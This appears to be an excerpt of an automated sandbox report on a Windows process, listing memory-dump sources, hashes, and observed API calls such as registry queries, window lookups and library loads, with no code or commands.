                                                                            • Opcode Fuzzy Hash: 8bafd3f3c844d8cb9feec0490b94f0f31ed4f101fb53fd0b53b0ea194e203a2e
                                                                            • Instruction Fuzzy Hash: C4324F74A15228CFCB65EFB0C8986ADB7B6BF48305F1081EAD50AA3344DB349E85CF55
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.7427126589.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 4d7318445cd0b8e8b679e938d98b53226019275cfc01efd165d423d815121be4
                                                                            • Instruction ID: b28bd0c71dd435a23ac57a93dce405fa013b5d932b40042edef8e6a49d909664
                                                                            • Opcode Fuzzy Hash: 4d7318445cd0b8e8b679e938d98b53226019275cfc01efd165d423d815121be4
                                                                            • Instruction Fuzzy Hash: F5324F74A15224CFCB65EFB0C8986ADB7B6BF48305F1081EAD50AA3344DB349E85CF55
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.7427126589.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: ea9cf958c7eb967f95a5f79c93d62ea71bcfe76a24684647695bff0ebd084d45
                                                                            • Instruction ID: 0d2c3d011aff05ff368af96f226c701b6ec807d5fac873e97c7da367825b78aa
                                                                            • Opcode Fuzzy Hash: ea9cf958c7eb967f95a5f79c93d62ea71bcfe76a24684647695bff0ebd084d45
                                                                            • Instruction Fuzzy Hash: 91224E74A05224CFCB65EFB0C8986ADB7B6BF48305F1081EAE50AA3344DB349E85CF55
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.7427126589.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 5f6e9894ec003133da211afee774e2473d4881ce6a88838723835301c13620c4
                                                                            • Instruction ID: a72e09d0ebea883d4e21defde6d39115eaa5d4ae6802167cf00a6d8b1b359821
                                                                            • Opcode Fuzzy Hash: 5f6e9894ec003133da211afee774e2473d4881ce6a88838723835301c13620c4
                                                                            • Instruction Fuzzy Hash: 04224E74A05224CFCB65EFB0C8986ADB7B6BF48305F5081EAE50AA3344DB349E85CF55
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.7427126589.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: c4de0192be57cc5354f34b091b091e3521047ec52af1a29b59f5314ca9be695b
                                                                            • Instruction ID: 1e5f1d4593a93a08dc4a3a82d87aa76c240e1a35523574541a6b11b70f132a03
                                                                            • Opcode Fuzzy Hash: c4de0192be57cc5354f34b091b091e3521047ec52af1a29b59f5314ca9be695b
                                                                            • Instruction Fuzzy Hash: 5D224E74A05224CFCB65EFB0C8986ADB7B6BF48305F5081EAE50AA3344DB349E85CF55
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.7427126589.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 644ad82f0a195675f0a21380381a98c03ecaf83e68f6ba5e0a5a6682d62cb76e
                                                                            • Instruction ID: 75de851d03586b0aba9da6b9ce808b1ac3b8a8bdaf286d7abb4fea43b5c784c5
                                                                            • Opcode Fuzzy Hash: 644ad82f0a195675f0a21380381a98c03ecaf83e68f6ba5e0a5a6682d62cb76e
                                                                            • Instruction Fuzzy Hash: 32224E74A05228CFCB65EFB0C8986ADB7B6BF48305F5081E9E50AA3344DB349E85CF55
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.7427126589.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: daf97ff95788caa60e16004ec05ed196781b9dff9ae6eee5894775954d13791b
                                                                            • Instruction ID: 58d922f87b4ea32fb2220870df4661021486a8bac43f4fbebec5ec4905bb7fe4
                                                                            • Opcode Fuzzy Hash: daf97ff95788caa60e16004ec05ed196781b9dff9ae6eee5894775954d13791b
                                                                            • Instruction Fuzzy Hash: 6C224E74A05224CFCB65EFB0C8986ADB7B6BF48305F5081E9E50AA3344DB349E85CF55
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.7427126589.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 45f8b78eeaf84d005aaf5b1e880d4f7a39d8e1d46f38f1b1b625f671a4b4fd26
                                                                            • Instruction ID: fcd98cc27721be9497d62145125a7fb986d021e4bef90973f67d1006ab28b42f
                                                                            • Opcode Fuzzy Hash: 45f8b78eeaf84d005aaf5b1e880d4f7a39d8e1d46f38f1b1b625f671a4b4fd26
                                                                            • Instruction Fuzzy Hash: B4124E74A05224CFCB65EFB0C8986ADB7B6BF88305F5081E9E50AA3344DB349E85CF55
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.7427126589.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: b3ffe473bed6da6868af4145f0ee45c500333b74bed3c364f661d605564d3d44
                                                                            • Instruction ID: cf2793d2cbba46d3f2f86723e43c4504220d7157e439781984159fbbad1100a8
                                                                            • Opcode Fuzzy Hash: b3ffe473bed6da6868af4145f0ee45c500333b74bed3c364f661d605564d3d44
                                                                            • Instruction Fuzzy Hash: 74124E74A05228CFCB65EFB0C8986ADB7B6BF48305F5081E9E50AA3344DB349E85CF55
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.7427126589.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 51abf1f083d63c5deca802d5edf3ad337e04aaff1cd425cf85578f5690122884
                                                                            • Instruction ID: 7014e59fd448b09b172d378bea266976ea79db2a2cb5a3fb2b302a356467149a
                                                                            • Opcode Fuzzy Hash: 51abf1f083d63c5deca802d5edf3ad337e04aaff1cd425cf85578f5690122884
                                                                            • Instruction Fuzzy Hash: 98124D74A05224CFCB65EFB0C8986ADB7B6BF88305F5081E9E50AA3344DB349E85CF55
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.7427126589.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: a7a89214202411099a881da7ab5e0bf69765f082a4356b2f92864cefd2901a5d
                                                                            • Instruction ID: 43eed97570000e451e3c27fe008364e34f1d99293ff5bc8fd49db18b36557e1e
                                                                            • Opcode Fuzzy Hash: a7a89214202411099a881da7ab5e0bf69765f082a4356b2f92864cefd2901a5d
                                                                            • Instruction Fuzzy Hash: DF123D74A05224CFCB64EFB0C8986ADB7B6BF88305F5085E9E50AA3344DB349E85CF55
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.7427126589.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 3de72da0c01f82db52b29c0128041274f934f98c3bf7c2b25ef41f43bf38dd24
                                                                            • Instruction ID: dc8a828151d294df6aaa8145dafef79aa9e8eadd90ddfea85b8c4b839e14b988
                                                                            • Opcode Fuzzy Hash: 3de72da0c01f82db52b29c0128041274f934f98c3bf7c2b25ef41f43bf38dd24
                                                                            • Instruction Fuzzy Hash: C7123D74A05224CFCB64EFB0C8987ADB7B6BF88205F5085E9E50AA3344DB349E85CF55
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.7442394718.000000001DAB0000.00000040.00000010.sdmp, Offset: 1DAB0000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 764d9f6dc52049eb4974223b87751a63c8da6dd8269f8a5e47ccd29aac3c978c
                                                                            • Instruction ID: 340688d44281f151b2d2f29dcad53ec3eec8c23de16fb7c405575e497593697c
                                                                            • Opcode Fuzzy Hash: 764d9f6dc52049eb4974223b87751a63c8da6dd8269f8a5e47ccd29aac3c978c
                                                                            • Instruction Fuzzy Hash: 78919D74A00B459FD724CF69C5907AAB7FABF88210F00892ED48AD7650DB75E846CB92
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 1E29690A
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.7444048842.000000001E290000.00000040.00000001.sdmp, Offset: 1E290000, based on PE: false
                                                                            Similarity
                                                                            • API ID: CreateWindow
                                                                            • String ID:
                                                                            • API String ID: 716092398-0
                                                                            • Opcode ID: e5a89093ea93abe10df3b47fd4a94726aa4c230bed13705e4f0805137e2b384a
                                                                            • Instruction ID: 50dedfb25cc67f2ba07e2bc6c0486c4d250135cf260bcc7a4c1ecbed8f86cc33
                                                                            • Opcode Fuzzy Hash: e5a89093ea93abe10df3b47fd4a94726aa4c230bed13705e4f0805137e2b384a
                                                                            • Instruction Fuzzy Hash: 7F518AB1C043999FCB11CFAAC8A0ADEBFF9BF49314F24815AE444AB221D7349844DF91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.7432885121.0000000001780000.00000040.00000010.sdmp, Offset: 01780000, based on PE: false
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 94999a679184465480efc21c2bfc5294938c3a04410161e3a1ee11f595d5cc30
                                                                            • Instruction ID: 69596f0b7330d008d3464e7a61641fa17aa0d4fd76fc966b24b534a6068ce668
                                                                            • Opcode Fuzzy Hash: 94999a679184465480efc21c2bfc5294938c3a04410161e3a1ee11f595d5cc30
                                                                            • Instruction Fuzzy Hash: 19519371A00245AFCB05EFB4C888AEEB7F5BF49214F148969E042DB255EF70EC498B91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.7432885121.0000000001780000.00000040.00000010.sdmp, Offset: 01780000, based on PE: false
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: e53e5acb0f55506cd6142fd455ded46423030559febfde7948503ed5ec0a7b84
                                                                            • Instruction ID: 6e16e1fed430543a4e485ca084b328197d8b94789a5c7592684eb712dd18fc46
                                                                            • Opcode Fuzzy Hash: e53e5acb0f55506cd6142fd455ded46423030559febfde7948503ed5ec0a7b84
                                                                            • Instruction Fuzzy Hash: 26516275B102059FCB04EFF4D888AAEB7F5BF88214B148969E4029B254EF71EC49CB91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.7432885121.0000000001780000.00000040.00000010.sdmp, Offset: 01780000, based on PE: false
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 55d8f479d84950d03a8a55b1663356d19c145a2f641b52e60498db10ff17f4b1
                                                                            • Instruction ID: ff296ea45074cbf31e0f84b079546c83360f757722e03dc51a82b296f0419a6c
                                                                            • Opcode Fuzzy Hash: 55d8f479d84950d03a8a55b1663356d19c145a2f641b52e60498db10ff17f4b1
                                                                            • Instruction Fuzzy Hash: 65518375A10305AFCB05EFB4D888AAEB7F5BF44210F148969E4029B255EF71EC49CB91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 1E29690A
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.7444048842.000000001E290000.00000040.00000001.sdmp, Offset: 1E290000, based on PE: false
                                                                            Similarity
                                                                            • API ID: CreateWindow
                                                                            • String ID:
                                                                            • API String ID: 716092398-0
                                                                            • Opcode ID: 7f43a5e7f7dd634afb146588b8f632cfe07271faf3112dc28ebadacd1ba699ee
                                                                            • Instruction ID: f8fe2dd9fff5d2ed58f57020c139f0a58f55482f1065cf5f0d4703b068450f59
                                                                            • Opcode Fuzzy Hash: 7f43a5e7f7dd634afb146588b8f632cfe07271faf3112dc28ebadacd1ba699ee
                                                                            • Instruction Fuzzy Hash: 9D51E2B1D10259EFDB14CF9AC890ADDBBB6FF48310F20862AE819AB210D7759945CF91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.7427472307.0000000001290000.00000040.00000001.sdmp, Offset: 01290000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 3ba668e9e491bc350e9604d8a1a9e493a3b42c50a0c26e45ead83708fe38f7b0
                                                                            • Instruction ID: ecf42203388693941c5f004a80d717f163da1a86dcb22746918cdc08024a6fe2
                                                                            • Opcode Fuzzy Hash: 3ba668e9e491bc350e9604d8a1a9e493a3b42c50a0c26e45ead83708fe38f7b0
                                                                            • Instruction Fuzzy Hash: 3241F472D1475A8FCB00CFB9D4147EEBBF5AF89220F148A6BD508A7241DB749885CBD1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 1E29690A
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.7444048842.000000001E290000.00000040.00000001.sdmp, Offset: 1E290000, based on PE: false
                                                                            Similarity
                                                                            • API ID: CreateWindow
                                                                            • String ID:
                                                                            • API String ID: 716092398-0
                                                                            • Opcode ID: 3e1ca3b916494ffe02ce0c531d4d28a15115595575c37e1dea86d1b61b45ca46
                                                                            • Instruction ID: 2ef3488fb3042c834daa249521698542583668767cc9a33d5e679e7a42cac9f6
                                                                            • Opcode Fuzzy Hash: 3e1ca3b916494ffe02ce0c531d4d28a15115595575c37e1dea86d1b61b45ca46
                                                                            • Instruction Fuzzy Hash: A251D2B1D10359DFDB14CF9AC890ADEBBF5BF48310F20862AE819AB210D770A945CF91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 1E29B4E1
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.7444048842.000000001E290000.00000040.00000001.sdmp, Offset: 1E290000, based on PE: false
                                                                            Similarity
                                                                            • API ID: CallProcWindow
                                                                            • String ID:
                                                                            • API String ID: 2714655100-0
                                                                            • Opcode ID: 21c5cdf3fd170b7952b4f6968e56c3d834bab40075d8365483d888fd8ede9f51
                                                                            • Instruction ID: 4b29d1fcbccb6909ea81fdbd419ae13dddbc23c36a17d6d047a2959493d7d696
                                                                            • Opcode Fuzzy Hash: 21c5cdf3fd170b7952b4f6968e56c3d834bab40075d8365483d888fd8ede9f51
                                                                            • Instruction Fuzzy Hash: 23416AB8900209CFDB10CF95C498B9ABBF6FF88310F24D559D50AAB321C774A840DFA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.7428065654.000000000134C000.00000040.00000001.sdmp, Offset: 0134C000, based on PE: false
                                                                            Similarity
                                                                            • API ID: TerminateThread
                                                                            • String ID:
                                                                            • API String ID: 1852365436-0
                                                                            • Opcode ID: 875349dec0635672671e892b06e069b48fe28eabcdff864d961bc7ce31b65f2f
                                                                            • Instruction ID: 835e3b06d9862b74605533550c9ebcd10a65c228d7815039a256fbd3905fc9db
                                                                            • Opcode Fuzzy Hash: 875349dec0635672671e892b06e069b48fe28eabcdff864d961bc7ce31b65f2f
                                                                            • Instruction Fuzzy Hash: 1A31E9300087958EDB166B7846B57F23FB2FF0B618F5E84C9C9D44A567E322668AC706
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 01292481
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.7427472307.0000000001290000.00000040.00000001.sdmp, Offset: 01290000, based on PE: false
                                                                            Similarity
                                                                            • API ID: QueryValue
                                                                            • String ID:
                                                                            • API String ID: 3660427363-0
                                                                            • Opcode ID: 2a36860d45a708d8b5bb467616184499484654bc389646800c1648018106f13c
                                                                            • Instruction ID: 0293b2d7185756b22f26b229141b69c1962f8561264fae61272080b6982fbb35
                                                                            • Opcode Fuzzy Hash: 2a36860d45a708d8b5bb467616184499484654bc389646800c1648018106f13c
                                                                            • Instruction Fuzzy Hash: 4E31CEB1D10259EBDB20CF9AD884A9EBBF5EF48710F14842AE918AB314D7709945CFA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.7428065654.000000000134C000.00000040.00000001.sdmp, Offset: 0134C000, based on PE: false
                                                                            Similarity
                                                                            • API ID: TerminateThread
                                                                            • String ID:
                                                                            • API String ID: 1852365436-0
                                                                            • Opcode ID: ae78cd2747668a2225ceabf3ba0c053e228e02ccbe495c0651197125b533086e
                                                                            • Instruction ID: fa01b4c1f08437aa0e4a3bdbc04e910da26df4c6fde71a66cd612298c0e986d3
                                                                            • Opcode Fuzzy Hash: ae78cd2747668a2225ceabf3ba0c053e228e02ccbe495c0651197125b533086e
                                                                            • Instruction Fuzzy Hash: 912149712093468FDB258F7C88D5BEB77E1EF42304F4981AAC8898B562D331A4C5C702
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • RegOpenKeyExW.KERNEL32(?,00000000,?,00000001,?), ref: 012921C4
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.7427472307.0000000001290000.00000040.00000001.sdmp, Offset: 01290000, based on PE: false
                                                                            Similarity
                                                                            • API ID: Open
                                                                            • String ID:
                                                                            • API String ID: 71445658-0
                                                                            • Opcode ID: 776fcbf39773d4f9f64ea09f5c1c787340228b44dbb569aafb8f2e96b478633e
                                                                            • Instruction ID: b7062a675fa18860256818e3461ad0cf9dfb3c60d7c66ca506f86ab5af9f044b
                                                                            • Opcode Fuzzy Hash: 776fcbf39773d4f9f64ea09f5c1c787340228b44dbb569aafb8f2e96b478633e
                                                                            • Instruction Fuzzy Hash: 6631FFB4D11249DFDB14CFA8C584ACEFBF5BF48304F24856AD908AB302C7759985CBA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • RegOpenKeyExW.KERNEL32(?,00000000,?,00000001,?), ref: 012921C4
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.7427472307.0000000001290000.00000040.00000001.sdmp, Offset: 01290000, based on PE: false
                                                                            Similarity
                                                                            • API ID: Open
                                                                            • String ID:
                                                                            • API String ID: 71445658-0
                                                                            • Opcode ID: 50bba44e20a4f1a7bd3d895f010147e8959904c0c0395dc6c2eef74778227e4f
                                                                            • Instruction ID: e53ae35a3b9e701368cff1bb7f635c8095b9cb7997c668bdb1029610d8b14d40
                                                                            • Opcode Fuzzy Hash: 50bba44e20a4f1a7bd3d895f010147e8959904c0c0395dc6c2eef74778227e4f
                                                                            • Instruction Fuzzy Hash: 8631FEB0D01249DFDB14CF99C584A8EFFF5BF48304F24856AE908AB301C7759985CBA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 1E29A5D7
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.7444048842.000000001E290000.00000040.00000001.sdmp, Offset: 1E290000, based on PE: false
                                                                            Similarity
                                                                            • API ID: DuplicateHandle
                                                                            • String ID:
                                                                            • API String ID: 3793708945-0
                                                                            • Opcode ID: ff8d81d3ddaffa6b2d0b5c3b1b9537cf31adef359d78af0894830d5abe429e57
                                                                            • Instruction ID: 04e2c10f76544e40a16ef307fe0bfba1c05ac05882b39f06ab2ba652a9c58c5b
                                                                            • Opcode Fuzzy Hash: ff8d81d3ddaffa6b2d0b5c3b1b9537cf31adef359d78af0894830d5abe429e57
                                                                            • Instruction Fuzzy Hash: F82128B5D00218AFDF00CFA9D880ADEBBF8EF49310F20851AE955A7310D374A945DFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,01299F62), ref: 0129A04F
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.7427472307.0000000001290000.00000040.00000001.sdmp, Offset: 01290000, based on PE: false
                                                                            Similarity
                                                                            • API ID: GlobalMemoryStatus
                                                                            • String ID:
                                                                            • API String ID: 1890195054-0
                                                                            • Opcode ID: 22cea94bbe9822dbb6f9f25311785fad8b96e3ecac88f345c07cb113dc018bdf
                                                                            • Instruction ID: e3df522924002989804e91bf1139f59d5e48df78a734b448156ae32e0a915558
                                                                            • Opcode Fuzzy Hash: 22cea94bbe9822dbb6f9f25311785fad8b96e3ecac88f345c07cb113dc018bdf
                                                                            • Instruction Fuzzy Hash: FF218472C0425A8FDF10CFA9D4047DDFBB5AF08324F15896ADA58A7641D338A984CFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 1E2957B6
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.7444048842.000000001E290000.00000040.00000001.sdmp, Offset: 1E290000, based on PE: false
                                                                            Similarity
                                                                            • API ID: HandleModule
                                                                            • String ID:
                                                                            • API String ID: 4139908857-0
                                                                            • Opcode ID: f4043c3ea7a30f8c467c46e8ffd649992a7abff92e19cd633789f4a2c2a81da5
                                                                            • Instruction ID: 99cc08b29b78eb926bc9ecbf022f11cc353b0fd9b214d3da0070ff8946735907
                                                                            • Opcode Fuzzy Hash: f4043c3ea7a30f8c467c46e8ffd649992a7abff92e19cd633789f4a2c2a81da5
                                                                            • Instruction Fuzzy Hash: 132175B5D04649CFDB10CFAAD440ADEFBF9EF4A314F10856AC999A7201C375A146CFA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 1E29A5D7
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.7444048842.000000001E290000.00000040.00000001.sdmp, Offset: 1E290000, based on PE: false
                                                                            Similarity
                                                                            • API ID: DuplicateHandle
                                                                            • String ID:
                                                                            • API String ID: 3793708945-0
                                                                            • Opcode ID: 42eebe78e3059597b2cc39410b3dd6029f4aedca583048d741ea407e72c39cdb
                                                                            • Instruction ID: 1dd11a99c69e00b37e1dba979724afa8a94a61de0aa9b63de5cc20318e61b92f
                                                                            • Opcode Fuzzy Hash: 42eebe78e3059597b2cc39410b3dd6029f4aedca583048d741ea407e72c39cdb
                                                                            • Instruction Fuzzy Hash: A421C4B5D00259AFDB10CFAAD884ADEFBF9EF48320F14841AE955A7310D374A944DFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • FindWindowW.USER32(00000000,00000000), ref: 0129F8B6
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.7427472307.0000000001290000.00000040.00000001.sdmp, Offset: 01290000, based on PE: false
                                                                            Similarity
                                                                            • API ID: FindWindow
                                                                            • String ID:
                                                                            • API String ID: 134000473-0
                                                                            • Opcode ID: 302ce15c51ddec2191a01bcbec7e7b612042b43917267f64ee247a50e71642ff
                                                                            • Instruction ID: 0336d9fd311aeb02822ae8d324d705860816c0613abb467c6a3fd2fcff331c5a
                                                                            • Opcode Fuzzy Hash: 302ce15c51ddec2191a01bcbec7e7b612042b43917267f64ee247a50e71642ff
                                                                            • Instruction Fuzzy Hash: D42102B5C1121A8FDB54CF9AD584ADEFBB4BB49210F10852ED519BB200C374A544CBA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • FindWindowW.USER32(00000000,00000000), ref: 0129F8B6
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.7427472307.0000000001290000.00000040.00000001.sdmp, Offset: 01290000, based on PE: false
                                                                            Similarity
                                                                            • API ID: FindWindow
                                                                            • String ID:
                                                                            • API String ID: 134000473-0
                                                                            • Opcode ID: 90004c43498514836b357b65620ec8c5daf440f0f554d7319665e1ba988960b4
                                                                            • Instruction ID: f6ee24c9b02b10d6cf252cd2a11e417031dabf4e03e0476f1ff70b340c6e2207
                                                                            • Opcode Fuzzy Hash: 90004c43498514836b357b65620ec8c5daf440f0f554d7319665e1ba988960b4
                                                                            • Instruction Fuzzy Hash: B22142B6C1121A8EDF14CF99D584ADEFBB4FF49210F10892EC519BB200C374A544CBA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,01299F62), ref: 0129A04F
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.7427472307.0000000001290000.00000040.00000001.sdmp, Offset: 01290000, based on PE: false
                                                                            Similarity
                                                                            • API ID: GlobalMemoryStatus
                                                                            • String ID:
                                                                            • API String ID: 1890195054-0
                                                                            • Opcode ID: 9fe3c16da8a921531aafd0075f55f12588ab8086fd500646bc5342118b34e44b
                                                                            • Instruction ID: b5d6879a6e1b68f7234c1f961605c4c4a9f980f7b674d2f83260c5751c48a593
                                                                            • Opcode Fuzzy Hash: 9fe3c16da8a921531aafd0075f55f12588ab8086fd500646bc5342118b34e44b
                                                                            • Instruction Fuzzy Hash: EC1103B1C106599BDB10CF9AD448BDEFBB8AF49324F10852AD918B7240D778A954CFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,01299F62), ref: 0129A04F
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.7427472307.0000000001290000.00000040.00000001.sdmp, Offset: 01290000, based on PE: false
                                                                            Similarity
                                                                            • API ID: GlobalMemoryStatus
                                                                            • String ID:
                                                                            • API String ID: 1890195054-0
                                                                            • Opcode ID: 101449be47abc6e3fa9077f7588b2b5621cdbfbee2ea32703a7ff768cb2f45a6
                                                                            • Instruction ID: 75dac6dce1144a5d04f4728ac56092dd3775d6bd5010906672081755bdab8a10
                                                                            • Opcode Fuzzy Hash: 101449be47abc6e3fa9077f7588b2b5621cdbfbee2ea32703a7ff768cb2f45a6
                                                                            • Instruction Fuzzy Hash: 1A1144B1C1061A9FDB00CFA9D4487DEFBF8AF48324F10862AD518B7240D378A954CFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • LoadLibraryExW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 1DAB2B1A
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.7442394718.000000001DAB0000.00000040.00000010.sdmp, Offset: 1DAB0000, based on PE: false
                                                                            Similarity
                                                                            • API ID: LibraryLoad
                                                                            • String ID:
                                                                            • API String ID: 1029625771-0
                                                                            • Opcode ID: dd5549ee44cb54f7a2c708ce5313ef0756a7b0c4e1d622c8f5b207b78b579968
                                                                            • Instruction ID: 55e9e3bc9bc86205273df37f1de28081894e8be74247f8024e9bdb6a96aaa212
